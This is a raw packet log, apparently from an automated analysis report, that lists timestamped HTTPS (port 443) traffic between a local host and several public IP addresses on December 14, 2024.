                                                            Dec 14, 2024 10:10:43.458483934 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.458899975 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:43.458964109 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.460118055 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.460675001 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:43.460675001 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:43.460768938 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.460849047 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.511686087 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:43.903038025 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.903146029 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.903330088 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:43.903393030 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.912985086 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.913062096 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.913176060 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:43.913243055 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.913502932 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:43.916496992 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.924249887 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.924333096 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:43.924393892 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.929392099 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.929651976 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:43.929713011 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:43.940773010 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:43.941220999 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:43.941282034 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:43.942172050 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:43.942244053 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:43.942749977 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:43.942821026 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:43.942905903 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:43.942923069 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:43.979391098 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:43.994513988 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.000231028 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.000565052 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.000627041 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.002084970 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.002284050 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.002573967 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.002573967 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.002702951 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.023077011 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.057609081 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.057668924 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.072825909 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.072886944 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.095993042 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.096215963 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.096277952 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.103272915 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.105510950 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.105597973 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.105631113 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.114015102 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.114217997 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.114279032 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.122152090 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.122327089 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.122389078 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.138109922 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.138223886 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.138286114 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.146346092 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.146441936 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.146503925 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.154911041 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.155177116 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.155239105 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.163058043 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.163140059 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.163201094 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.170725107 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.170923948 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.170988083 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.177208900 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.177283049 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.177345037 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.183871031 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.183933973 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.183959961 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.190371990 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.190535069 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.190588951 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.190588951 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.190891981 CET49770443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.190953970 CET44349770104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.345487118 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.345527887 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.345796108 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.345796108 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:44.345860958 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.356234074 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:44.356318951 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.356403112 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:44.356723070 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:44.356796026 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:44.385674000 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.385703087 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.385823965 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.385854959 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.389524937 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.389658928 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.389688969 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.397212982 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.397231102 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.397259951 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.397291899 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.397342920 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.401310921 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.407448053 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.407598972 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.407628059 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.433897972 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.434696913 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.434762955 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.434793949 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.443474054 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.443545103 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.443672895 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.443705082 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.443763971 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.446590900 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.451113939 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.451184034 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.451214075 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.459768057 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.459876060 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.459907055 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.463109016 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.467340946 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.467411041 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.467442036 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.505525112 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.510097980 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.557193041 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.576401949 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.579978943 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.580132008 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.580193996 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.595330954 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.595642090 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.595701933 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.603521109 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.603660107 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.603719950 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.611749887 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.611957073 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.612016916 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.619962931 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.620131016 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.620223045 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.628715992 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.628853083 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.628912926 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.639046907 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.639204979 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.639265060 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.647392035 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.647710085 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.647769928 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.655683041 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.655854940 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.655915976 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.670084000 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.670119047 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.670255899 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.670319080 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.670392990 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.674329996 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.674354076 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.674371004 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.674421072 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.674438953 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.674513102 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.674513102 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.674513102 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.674513102 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.674587011 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.674633980 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.674684048 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.696311951 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.710927010 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.710980892 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.711158991 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.711229086 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.711272955 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.711297035 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.744786978 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.744848967 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.769012928 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.769141912 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.769287109 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.769288063 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.769388914 CET49771443192.168.2.4104.17.24.14
                                                            Dec 14, 2024 10:10:44.769424915 CET44349771104.17.24.14192.168.2.4
                                                            Dec 14, 2024 10:10:44.839148998 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.839195967 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.839262962 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.839353085 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.839404106 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.839404106 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.867985010 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.868042946 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.868211985 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.868212938 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.868313074 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.868371010 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.880121946 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.880312920 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:44.880315065 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.880383968 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.880786896 CET49772443192.168.2.4151.101.66.137
                                                            Dec 14, 2024 10:10:44.880825043 CET44349772151.101.66.137192.168.2.4
                                                            Dec 14, 2024 10:10:45.563771009 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.563987970 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:45.564002991 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.567519903 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.567579985 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:45.567961931 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:45.568094969 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:45.568134069 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.570668936 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.570838928 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:45.570899010 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.572365046 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.572433949 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:45.572715998 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:45.572825909 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:45.572839022 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.572858095 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.616565943 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:45.616588116 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.616591930 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:45.616652012 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:45.664370060 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:45.664377928 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.006917000 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.007040024 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.007258892 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.007286072 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.012937069 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.013169050 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.013175964 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.017663956 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.026787996 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.026875973 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.026887894 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.026967049 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.027041912 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.027067900 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.031754017 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.034009933 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.034015894 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.041420937 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.042216063 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.042222977 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.046099901 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.046189070 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.046252966 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.046284914 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.046344042 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.050745010 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.050828934 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.050893068 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.050900936 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.099673986 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.099962950 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.127835035 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.137339115 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.141410112 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.142574072 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.142635107 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.179940939 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.179960012 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.189625978 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.201981068 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.202474117 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.202481985 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.204612970 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.209703922 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.210593939 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.210656881 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.210690975 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.210740089 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.212327003 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.213668108 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.213732958 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.213741064 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.213782072 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.215413094 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.218946934 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.227375984 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.227459908 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.227520943 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.230292082 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.230343103 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.230350018 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.235658884 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.235827923 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.235852957 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.235888004 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.236864090 CET49774443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.236895084 CET44349774104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.238632917 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.238703012 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.238709927 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.247026920 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.247076035 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.247082949 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.255527973 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.255605936 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.255613089 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.263408899 CET49775443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.263449907 CET44349775104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.263520956 CET49775443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.263829947 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.263921022 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.264035940 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.264224052 CET49775443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.264235973 CET44349775104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.264431953 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:46.264483929 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.264740944 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.264846087 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.264854908 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.271800995 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.271939993 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.271946907 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.278094053 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.278151989 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.278158903 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.284353018 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.284498930 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.284506083 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.290712118 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.290851116 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.290858984 CET44349773104.18.95.41192.168.2.4
